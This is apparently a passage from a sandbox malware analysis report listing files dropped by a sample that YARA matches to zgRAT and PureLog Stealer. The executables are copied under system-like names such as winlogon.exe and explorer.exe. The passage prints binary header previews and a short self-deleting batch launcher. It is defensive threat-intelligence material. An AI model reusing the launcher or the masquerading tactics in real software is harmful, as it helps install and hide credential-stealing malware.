                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\SoftwareDistribution\winlogon.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\SoftwareDistribution\winlogon.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with very long lines (898), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):898
                                                            Entropy (8bit):5.893985052983247
                                                            Encrypted:false
                                                            SSDEEP:12:Nmrmz1vXVPlCyCs9xl9GMM5BY5KO1maGD7GkGfkilbkllEqOMWdcbTM2ZUzvdm4R:NmG1d9qSfARByP7I7eSEc3qzvMzo
                                                            MD5:440B078DDEBE215A5A6E7D5DE71A4880
                                                            SHA1:B7AFAC071F253C8F6E539B0877214598F3EB17FB
                                                            SHA-256:31F9E0ABA9AE39C5A7FB7EEB64AD54A79083F5F0D0D1116FFA8DBDE372A98B1B
                                                            SHA-512:7C95CDF42DB61C591E76EFD607AECF41DBCC6A39F61360A3C8233151CD61DC284D35CDF504942E507AAA8421717188A90187C345A110ABD2056FCF6129E7F5B7
                                                            Malicious:false
                                                            Preview:
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\upfc.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\upfc.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):61
                                                            Entropy (8bit):5.1723002472925526
                                                            Encrypted:false
                                                            SSDEEP:3:FkV1b+BsTmsEATsRspX5Py:FkLb+BsaygRsppK
                                                            MD5:D94451A88CDE7DA9777CEF3E06EC5470
                                                            SHA1:9E2A36F83C06041DF309AA46579E841F80CCA9B9
                                                            SHA-256:52804D2EF08FC825AC69C647779AC9DA8906FC4B30EB2A9E2130908EE204A7E6
                                                            SHA-512:6B1FBC3F956A9318F8260BEFF22110A793BE20F5B6C9F3FD4CA2D26054F3C924A9AFA1D79D2BA8014D1DCC095C69AC554D8EA2A4F5FCC9AE1EF3029C5A6FB496
                                                            Malicious:false
                                                            Preview:wZa9pp7cocpDHFNfGdIv14AGIwS5u6iWZssZun9TvI4KPKJJXOqGYyL2ZT13W
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):36628992
                                                            Entropy (8bit):1.2119709262700702
                                                            Encrypted:false
                                                            SSDEEP:98304:xdqTz4+mudOlbI9tp2159NiHZOGDjuXn:xdqvYwO23mwY
                                                            MD5:CADD0C3B32099635F889BA630C4697F4
                                                            SHA1:305F57AC6C6A0AFBDC7666A6964BC2ACBB2ED738
                                                            SHA-256:CD91CE0978CF8DF9A22D3275FD693EBC759263485550DF913D837694FC3AFCB4
                                                            SHA-512:4712774B492B09866ED752404D248B87B595282B7B3B617C73AE1A029D5628C186E980768515EEBDB950E1C89C11CB8BA47A382192400701D3DC961A98EA4714
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................n8...........8.. ....8...@.. ........................8...........@.................................`.8.K.....8. .....................8...................................................... ............... ..H............text....m8.. ...n8................. ..`.rsrc... .....8......p8.............@....reloc........8......t8.............@..B..................8.....H...........H...........<.....-..8......................................0..........(.... ........8........E....).......M...\...8$...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....(.... ....8....*....0.......... ........8........E....v.......E.......j...8q...~....:f... ....8........~....(N...~....(R... ....?:... ....8.......... ....~....{....:....& ....8}...r...ps....z*~....(F... .... .... ....s....~....(J....... ....~....{....91...& ....8&.....(....*
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with very long lines (335), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):335
                                                            Entropy (8bit):5.802392987223497
                                                            Encrypted:false
                                                            SSDEEP:6:qhnyng1SPepjZVUijRVcESSN8eV5CdpokIwU+Z2irOjdbdaLV2RufBnsyyx5Lq2:qhn4gcerV5RJSS6eRkNUr5djR/yyx5q2
                                                            MD5:4D3A07456E7C20718284A029EB62B89E
                                                            SHA1:105C0DA185A13581209F8ED9C9722367BF0B7704
                                                            SHA-256:66BD27C42638650F857E8273AB30A54C0589189885B84365C5D8203A3053628B
                                                            SHA-512:1A9AF1B5D187F9AC34C876FF37D9B91A3421F1D7AD04C91BD7490CB2AA164184D634C4117CD42D23CC5D43D78924793EDDF1E1AC9EED1D8E2CC64338BBABBC1E
                                                            Malicious:false
                                                            Preview:q3NzXNsZkjhkDNVbbBjBVs1YPbgx9UKYS02FVw5qNTVUjIWN4NXQ8w87Byk6r5aQYIRMUQFpF2yCWhzGES2v73af24DhL88R3F5a0J3oIrLG86ke8e2ZCoTeswUZNidG3gJRlYP5ZOnPsTg5UjirGjOOvasEydbkOEMcxT2jO6AyBDwYPYFn9w9US4fKqKG5xDAoHEIAq9cKjaMsoUyZXxkcE2K2xs3E0EB8CHQKQE7ATzv2sxfWVqiAcijP4QM7FYTeYNphDnJSzjIOHRJAMgsJgBgeiBQ91945gQdeI8SshPK2aUHmGMviqK8XrK8BXJb0pMs0yp1OOAm
                                                            Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.354334472896228
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1915
                                                            Entropy (8bit):5.363869398054153
                                                            Encrypted:false
                                                            SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIs0HKjJHVHmHKlT4vHNpv:iqbYqGSI6oPtzHeqKktwmj0qV1GqZ4vb
                                                            MD5:0C47412B6C6EF6C70D4B96E4717A5D3B
                                                            SHA1:666FCC7898B52264D8A144600D7A3B0B59E39D66
                                                            SHA-256:0B3F6655476FA555F55859443DE496AF7279529D291EF9745C22C5C283B648F9
                                                            SHA-512:4E51FCBCA176BF9C5175478C23AE01445F13D9AC93771C7F73782AF9D98E8544A82BBFB5D3AA6E2F3ECF1EFB59A8466EB763A30BD795EFE78EE46429B2BEAC6C
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f
                                                            Process:C:\Recovery\upfc.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.354334472896228
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:NlllulxmH/lZ:NllUg
                                                            MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                                            SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                                            SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                                            SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                                            Malicious:false
                                                            Preview:@...e................................. ..............@..........
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e0, 10 symbols, created Mon Jan 13 14:14:40 2025, 1st section name ".debug$S"
                                                            Category:dropped
                                                            Size (bytes):1944
                                                            Entropy (8bit):4.534344617726197
                                                            Encrypted:false
                                                            SSDEEP:24:HohC9TOvPbHjwKvNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+WUZ:WvzUKvEluOulajfqXSfbNtmhBZ
                                                            MD5:98690343126CE52AB0175102043E7938
                                                            SHA1:AAB9F0E3160379D98D558F69E5363CB872409FAC
                                                            SHA-256:4085CE5B3DFFB90EABB2EA2E1F8969F4E94AD7CE9FCC0130D5C146A4DB422D51
                                                            SHA-512:D7BAE7EBA228817BB1192584FFEF91B0C9D7A49BBDD578865FA7837DFC10D68C250B76A5438838CE6AD57955841A394916A487A307A9666C7A5E926F0171CDF6
                                                            Malicious:false
                                                            Preview:L......g.............debug$S........0...................@..B.rsrc$01................\...........@..@.rsrc$02........p...p...............@..@........=....c:\Windows\System32\CSCC80490C767BA46838348DF24F5FE6FCA.TMP.....................r.av..t.y..............2.......C:\Users\user\AppData\Local\Temp\RESD.tmp.-.<....................a..Microsoft (R) CVTRES.V.=..cwd.C:\Browserhost.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c8, 10 symbols, created Mon Jan 13 14:14:40 2025, 1st section name ".debug$S"
                                                            Category:dropped
                                                            Size (bytes):1920
                                                            Entropy (8bit):4.598806000568403
                                                            Encrypted:false
                                                            SSDEEP:24:Ho5zW9rLzUWFl4PHNFwKvN0lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+2cN:nLzUa4PEKvilmuulB+hnqXSfbNtmhj
                                                            MD5:D6A0FB2D894C6BE1407F907E74FB7B66
                                                            SHA1:CA19C56711751484BD2B58DB367300CBA34EADB0
                                                            SHA-256:6973A97260E7F677E8F74711FF22A26E0F5BB7F0E58A33C77A3F35E86DE4B1EA
                                                            SHA-512:8D6A1920FE957056CEE08DB5C94E7ECE7D8F6498643E58207863E26FB50640E986D2644C9394F8B7F6DA564497FE71A4557210AB6422E632B285FB915BEF4F68
                                                            Malicious:false
                                                            Preview:L......g.............debug$S........P...................@..B.rsrc$01................|...........@..@.rsrc$02........8...................@..@........Y....c:\Program Files (x86)\Microsoft\Edge\Application\CSC93052B3B6324D99AC47AF4632C48EC.TMP......................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RESFE67.tmp.-.<....................a..Microsoft (R) CVTRES.V.=..cwd.C:\Browserhost.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...
                                                            Process:C:\Browserhost\intoHostperf.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):163
                                                            Entropy (8bit):5.2167103006036974
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mHBZ7+yBktKcKZG1Ukh4E2J5xAIbycUBq:hCRLuVFOOr+DEHBZqyKOZG1923fbycqq
                                                            MD5:279CB8734D9878FBBE1B876558088B94
                                                            SHA1:E6E4E232B76398DAD53E08C6611DBB67A058CB93
                                                            SHA-256:BC5D8AAB7DF431D25319E80C57A486918FC177CB1180244E8D060B4E1510613E
                                                            SHA-512:D76F5E69CE6804615E9EC363AD6492A287A0E08C692F3DF50348397664549D6F0487C8E176F0C5F5956A2474195B71EC45CC4C943712D1835783C0EDAD457C62
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Browserhost\LaSqLWtOcizKrlm.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\ZtWwdj1Vck.bat"
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
